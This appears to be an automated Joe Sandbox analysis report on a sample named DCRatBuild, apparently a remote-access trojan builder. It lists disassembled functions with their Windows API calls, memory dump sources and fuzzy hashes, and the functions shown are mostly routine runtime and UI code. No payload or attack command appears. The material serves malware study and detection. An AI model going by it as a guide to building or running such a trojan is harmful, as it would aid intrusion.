                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004A9EEE
                                                                                                                        • GetWindowRect.USER32(?,00000000), ref: 004A9F44
                                                                                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 004A9FDB
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004A9FE3
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 004A9FF9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$RectText
                                                                                                                        • String ID: J$RarHtmlClassName
                                                                                                                        • API String ID: 3937224194-751939351
                                                                                                                        • Opcode ID: 6c7e2ac19ec1c36360a4cfbcb4615d44d8dfc635b6f7c37eb14788f01b179aeb
                                                                                                                        • Instruction ID: 461d138edf80869423c0509cad094063a2786c08bf27821e43900a8a95be1c40
                                                                                                                        • Opcode Fuzzy Hash: 6c7e2ac19ec1c36360a4cfbcb4615d44d8dfc635b6f7c37eb14788f01b179aeb
                                                                                                                        • Instruction Fuzzy Hash: A8410231008310EFDB219F65DD48B7B7BA8FF59716F00452AF9099A156CB38DD24CB6A
                                                                                                                        Function 004A1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __aulldiv.LIBCMT ref: 004A122E
                                                                                                                          • Part of subcall function 0049B146: GetVersionExW.KERNEL32(?), ref: 0049B16B
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 004A1251
                                                                                                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 004A1263
                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004A1274
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004A1284
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004A1294
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004A12CF
                                                                                                                        • __aullrem.LIBCMT ref: 004A1379
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1247370737-0
                                                                                                                        • Opcode ID: f32777bfbd3b270e8392a1abb277511db75c35e92f4f00f6e888d1c29f0fda63
                                                                                                                        • Instruction ID: 58aaed64854dae9ad679816e367d99ebffe5db3ef850b26f6c623ec8ed5477f9
                                                                                                                        • Opcode Fuzzy Hash: f32777bfbd3b270e8392a1abb277511db75c35e92f4f00f6e888d1c29f0fda63
                                                                                                                        • Instruction Fuzzy Hash: B24148B2408305AFC710DF65C88096BBBF9FF88315F04892EF996C2210E738E609CB56
                                                                                                                        Function 00492210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00492536
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                          • Part of subcall function 004A05DA: _wcslen.LIBCMT ref: 004A05E0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                                                        • API String ID: 3053425827-2277559157
                                                                                                                        • Opcode ID: 6dcaece89dd07bd5e9b269a50763a19dba235d4c479f965ee06a7e2b4a6a3c80
                                                                                                                        • Instruction ID: 6c292c202eb496c699a7e274eb8bdd88d0aa193cd905711cc3f6ed480ebccf6f
                                                                                                                        • Opcode Fuzzy Hash: 6dcaece89dd07bd5e9b269a50763a19dba235d4c479f965ee06a7e2b4a6a3c80
                                                                                                                        • Instruction Fuzzy Hash: CCF13870604340ABDF24EB2586D5BEE7F955B91304F08097FEC869B383CBAC9945C76A
                                                                                                                        Function 004A9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                        • API String ID: 176396367-3568243669
                                                                                                                        • Opcode ID: 68cb4b48f71e2368d9402b99842523074112fbad1b5defd40d9c56c9049655c4
                                                                                                                        • Instruction ID: fe296f40557a5bb0eab1ab2327ec3d08d6b9cca8def06fe0d8bd3d09baa5f351
                                                                                                                        • Opcode Fuzzy Hash: 68cb4b48f71e2368d9402b99842523074112fbad1b5defd40d9c56c9049655c4
                                                                                                                        • Instruction Fuzzy Hash: 7351E36674132295DB309A259821B7773E0DFB3750F68442BF9C18B3C1FB6D8C81826D
                                                                                                                        Function 004BF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004BFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 004BF6CF
                                                                                                                        • __fassign.LIBCMT ref: 004BF74A
                                                                                                                        • __fassign.LIBCMT ref: 004BF765
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 004BF78B
                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,004BFE02,00000000,?,?,?,?,?,?,?,?,?,004BFE02,00000000), ref: 004BF7AA
                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,004BFE02,00000000,?,?,?,?,?,?,?,?,?,004BFE02,00000000), ref: 004BF7E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: 468ffe935973984c0b9b64aa30ba19baa21313ab860b86d317b1b7ad3249e587
                                                                                                                        • Instruction ID: ff0f68f70660ecd43581cc70ffff6b5f98b60b117d2e736192b7c21271e9359d
                                                                                                                        • Opcode Fuzzy Hash: 468ffe935973984c0b9b64aa30ba19baa21313ab860b86d317b1b7ad3249e587
                                                                                                                        • Instruction Fuzzy Hash: 4051B2B19002099FCB10CFA8DC85AEEBBF5EF09300F14416BE955E7251D774AA45CBA8
                                                                                                                        Function 004ACE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 004ACE9D
                                                                                                                          • Part of subcall function 0049B690: _wcslen.LIBCMT ref: 0049B696
                                                                                                                        • _swprintf.LIBCMT ref: 004ACED1
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,004D946A), ref: 004ACEF1
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004ACF22
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004ACFFE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                        • String ID: %s%s%u
                                                                                                                        • API String ID: 689974011-1360425832
                                                                                                                        • Opcode ID: 0851c8ce286548b785c705ab9c79914900653a676e24da9267683a4731048431
                                                                                                                        • Instruction ID: 36762bf8bc4e73716b2d9f5e49f541feb4dbbc1c53ec3282e97824ab32344306
                                                                                                                        • Opcode Fuzzy Hash: 0851c8ce286548b785c705ab9c79914900653a676e24da9267683a4731048431
                                                                                                                        • Instruction Fuzzy Hash: 2F41A3B1800258AADF609B50CC85EEF77BCEB16304F4084A7F90AE7141EE789E44CF69
                                                                                                                        Function 004B2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 004B2937
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 004B293F
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 004B29C8
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004B29F3
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 004B2A48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: 7d69c304e5c5c9833d6333eee2bf8fe83eb7f2d3b050d39c055f15a30a26c9bb
                                                                                                                        • Instruction ID: 124f261dd3b4069605fcd70fc5f3d18a0fc6e2617b53afac153aafba1ea4a10e
                                                                                                                        • Opcode Fuzzy Hash: 7d69c304e5c5c9833d6333eee2bf8fe83eb7f2d3b050d39c055f15a30a26c9bb
                                                                                                                        • Instruction Fuzzy Hash: 4D41E774A00208AFCF10DF29C881ADE7BB0EF05314F14815BE818AB352D7B99A15CBB5
                                                                                                                        Function 004A9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                        • API String ID: 176396367-3743748572
                                                                                                                        • Opcode ID: d69b6f48ea556585adf3ed8632a87830c3c4b94a1553d6ef0b95dfbb535d9706
                                                                                                                        • Instruction ID: cd389d40c7c7b3b9172f876f2a818b2b880bd8a25c4aa3112380dc61e6ab0c13
                                                                                                                        • Opcode Fuzzy Hash: d69b6f48ea556585adf3ed8632a87830c3c4b94a1553d6ef0b95dfbb535d9706
                                                                                                                        • Instruction Fuzzy Hash: 55315E7664438566EA30AF559C42BB773A4EBA1320F60442FF48657380FB6CAD4183AD
                                                                                                                        Function 004BC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004BC868: _free.LIBCMT ref: 004BC891
                                                                                                                        • _free.LIBCMT ref: 004BC8F2
                                                                                                                          • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
                                                                                                                          • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
                                                                                                                        • _free.LIBCMT ref: 004BC8FD
                                                                                                                        • _free.LIBCMT ref: 004BC908
                                                                                                                        • _free.LIBCMT ref: 004BC95C
                                                                                                                        • _free.LIBCMT ref: 004BC967
                                                                                                                        • _free.LIBCMT ref: 004BC972
                                                                                                                        • _free.LIBCMT ref: 004BC97D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                        • Instruction ID: efe652c1a4ff1327f34c2bc7492a6ab9494f38def2c60607625e65fac1c25c1e
                                                                                                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                        • Instruction Fuzzy Hash: C2111271580704A6E520B772DC87FCB7BAC9F14B09F404C2FB29D66192DA69B505CB74
                                                                                                                        Function 004AE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,004AE669,004AE5CC,004AE86D), ref: 004AE605
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 004AE61B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 004AE630
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                        • Opcode ID: 06846636046100ea72c11598e2372c2a37e6e4a285c48a1d323e79bf4956cb53
                                                                                                                        • Instruction ID: 9a4973dcee7733638f6093c525d6cbdb18b70124be646fcd22b29402c28daf77
                                                                                                                        • Opcode Fuzzy Hash: 06846636046100ea72c11598e2372c2a37e6e4a285c48a1d323e79bf4956cb53
                                                                                                                        • Instruction Fuzzy Hash: D0F0C232781662DB4B614E675C84BBB32C86A3B7453504C3BDA21D3310EB2DCC52ABAD
                                                                                                                        Function 004B8900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 004B891E
                                                                                                                          • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
                                                                                                                          • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
                                                                                                                        • _free.LIBCMT ref: 004B8930
                                                                                                                        • _free.LIBCMT ref: 004B8943
                                                                                                                        • _free.LIBCMT ref: 004B8954
                                                                                                                        • _free.LIBCMT ref: 004B8965
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID: pL
                                                                                                                        • API String ID: 776569668-1374626527
                                                                                                                        • Opcode ID: cebfdcee971c99061597f04a282ef12f3da56292117425e1a76ae977583b4620
                                                                                                                        • Instruction ID: fc157c8cd96dd8fc5868d5cd073763413b5bf080556de608b529f733c55157c0
                                                                                                                        • Opcode Fuzzy Hash: cebfdcee971c99061597f04a282ef12f3da56292117425e1a76ae977583b4620
                                                                                                                        • Instruction Fuzzy Hash: 4BF03A718101228BCA466F15FE028E63BA9F724718381056FF114922B1CBBA4961DFAD
                                                                                                                        Function 004A146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004A14C2
                                                                                                                          • Part of subcall function 0049B146: GetVersionExW.KERNEL32(?), ref: 0049B16B
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004A14E6
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004A1500
                                                                                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004A1513
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004A1523
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004A1533
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2092733347-0
                                                                                                                        • Opcode ID: 678ca0bb1a8599df4d6d1bcb22317f3eacea4a2395659d91d3360e81da90463c
                                                                                                                        • Instruction ID: bcb2db4f0102a5356e032e5affee43b44dd3344e34e49ea07fb263025f1dfbde
                                                                                                                        • Opcode Fuzzy Hash: 678ca0bb1a8599df4d6d1bcb22317f3eacea4a2395659d91d3360e81da90463c
                                                                                                                        • Instruction Fuzzy Hash: 1031F775108315AFC700DFA8C88499BBBE8BF98754F048A2EF995C3210E734D509CBAA
                                                                                                                        Function 004B2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,004B2AF1,004B02FC,004AFA34), ref: 004B2B08
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004B2B16
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004B2B2F
                                                                                                                        • SetLastError.KERNEL32(00000000,004B2AF1,004B02FC,004AFA34), ref: 004B2B81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
